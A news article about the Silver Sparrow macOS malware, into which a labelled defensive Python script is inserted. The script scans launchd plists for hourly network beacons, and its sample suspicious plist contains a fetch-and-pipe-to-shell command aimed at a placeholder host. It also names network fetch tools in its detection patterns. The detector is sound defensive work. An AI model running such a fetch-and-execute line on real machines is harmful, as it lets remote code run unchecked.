Hackers Snuck Mysterious Malware Onto Thousands of Macs, But Researchers Can't Figure Out Why


Photo: Justin Sullivan (Getty Images)


A new type of malware has infected Mac devices around the world, most notably in the US and parts of Europe, and experts are unable to determine where it came from or what it does.

The malicious program, discovered by security firm Red Canary, has affected 29,139 macOS endpoints in 153 countries. Dubbed "Silver Sparrow", it shows the highest infection rates in the US, UK, France, Germany and Canada. The program is also one of the first malware types compatible with Apple's new M1 chip.

Researchers describe "Sparrow" as a ticking time bomb: the malware does not yet appear to have a specific function. Instead, it lies in wait, checking in with a command-and-control server once an hour to see whether there are any new commands it should run on infected devices.

"After observing the malware for over a week, neither we nor our research partners have observed a final payload, leaving the ultimate goal of Silver Sparrow activity a mystery," writes Red Canary's Tony Lambert. "Whether a payload has already been delivered and removed, or whether the adversary has a future timeline for distribution, we have no way of knowing with certainty what payload would be distributed by the malware." Researchers also do not yet know how the devices are being infected.

Even more disturbing, "Sparrow" appears designed to wipe itself from a computer once it has delivered its payload. Lambert said the program includes a file check that "removes all its components from the endpoint", deleting all of its persistence mechanisms and scripts. As Ars Technica writes, such capabilities are typically found in "high-stealth operations", i.e. intrusion campaigns that are covert by design.
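The two behaviours above, a job that beacons to a control server once an hour and persistence that a defender would want to enumerate, are the kind of thing a hunting script can look for on a Mac. The following is an added example, not code from the article or from Red Canary: it parses launchd job plists and flags jobs that run a network fetch on an hourly schedule. The article does not name Silver Sparrow's persistence mechanism, so the assumption that the beacon is a launchd agent with a StartInterval of 3600 seconds is the example's own, chosen because that is the usual way to schedule a recurring job on macOS; every label, path and URL in the sample plists is constructed for illustration and is not an indicator of compromise.

```python
"""Triage launchd job plists for hourly network beacons.

Added example; not from the article or Red Canary. The persistence mechanism
(a launchd agent with StartInterval 3600) and every label, path and URL below
are assumptions constructed for illustration, not Silver Sparrow indicators.
"""
import os
import plistlib
import re
from typing import Iterable
from xml.parsers.expat import ExpatError

# Substrings that mean "this job talks to the network".
NETWORK_FETCHERS = ("curl", "wget", "nscurl")
# Fetched content handed straight to an interpreter.
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash|zsh|python3?)\b")

# Constructed sample plists (not real artefacts).
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key>
  <array>
    <string>/usr/bin/rsync</string><string>-a</string>
    <string>/Users/alice/Documents</string><string>/Volumes/Backup</string>
  </array>
  <key>StartCalendarInterval</key>
  <dict><key>Hour</key><integer>2</integer><key>Minute</key><integer>0</integer></dict>
</dict>
</plist>
"""

SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -s https://updates.example.invalid/check | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict>
</plist>
"""


def triage_launchd_plist(data: bytes) -> dict:
    """Return {"label", "reasons", "suspicious"} for one launchd plist."""
    try:
        job = plistlib.loads(data)
    except (plistlib.InvalidFileException, ExpatError) as exc:
        # launchd would not load it either; report but do not flag.
        return {"label": None, "reasons": [f"unparseable plist: {exc}"], "suspicious": False}

    # Jobs use either ProgramArguments or Program; normalise to one command string.
    args = job.get("ProgramArguments") or [job.get("Program", "")]
    command = " ".join(str(a) for a in args)
    reasons = []

    interval = job.get("StartInterval")
    if isinstance(interval, int) and 3000 <= interval <= 4200:  # roughly hourly
        reasons.append("hourly StartInterval")
    if any(tool in command for tool in NETWORK_FETCHERS):
        reasons.append("network fetch in ProgramArguments")
    if PIPE_TO_SHELL.search(command):
        reasons.append("pipes fetched content into an interpreter")
    if job.get("RunAtLoad") is True:
        reasons.append("RunAtLoad")

    # A beacon is the combination of a periodic schedule and network activity;
    # either alone is common in legitimate software.
    suspicious = ("hourly StartInterval" in reasons
                  and "network fetch in ProgramArguments" in reasons)
    return {"label": job.get("Label"), "reasons": reasons, "suspicious": suspicious}


def find_beacons(plists: Iterable[bytes]) -> list:
    """Labels of every plist that looks like an hourly network beacon."""
    return [r["label"] for r in map(triage_launchd_plist, plists) if r["suspicious"]]


def scan_launchd_dirs(dirs=None) -> list:
    """Triage every .plist under the usual launchd locations on a live Mac."""
    dirs = dirs or [os.path.expanduser("~/Library/LaunchAgents"),
                    "/Library/LaunchAgents", "/Library/LaunchDaemons"]
    found = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            with open(path, "rb") as fh:
                result = triage_launchd_plist(fh.read())
            if result["suspicious"]:
                found.append((path, result["reasons"]))
    return found


if __name__ == "__main__":
    for label in find_beacons([BENIGN_PLIST, SUSPICIOUS_PLIST]):
        print("possible beacon:", label)
    for path, reasons in scan_launchd_dirs():
        print(path, reasons)
```

Run on its own, the script triages the two constructed plists and then the real launchd directories on the machine it runs on. Anything it flags is a lead, not a verdict: plenty of legitimate updaters poll a server on a schedule, so the result should be compared against the indicators Red Canary published rather than acted on blindly.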

Two different strains of the malware were discovered. Below is Red Canary's technical breakdown of the two versions and how they work:


[Screenshot: Red Canary's technical breakdown of the two Silver Sparrow versions. Screenshot: Lucas Ropek / Red Canary]

Although researchers are ultimately puzzled about why the malware exists, it poses a credible danger to infected systems.

"While we have not yet observed Silver Sparrow delivering additional malicious payloads, its forward-looking M1 chip compatibility, global reach, relatively high infection rate and operational maturity suggest that Silver Sparrow is a highly serious threat, uniquely positioned to deliver a potentially impactful payload," Lambert wrote.

Apple appears to have stepped in to stop the malware's spread. The company told MacRumors that it has revoked the certificates of the developer accounts used to sign the "Sparrow" packages, which should prevent other Macs from being infected.

Still, if you're worried that your device might be compromised, you can check it against the list of indicators provided by Red Canary.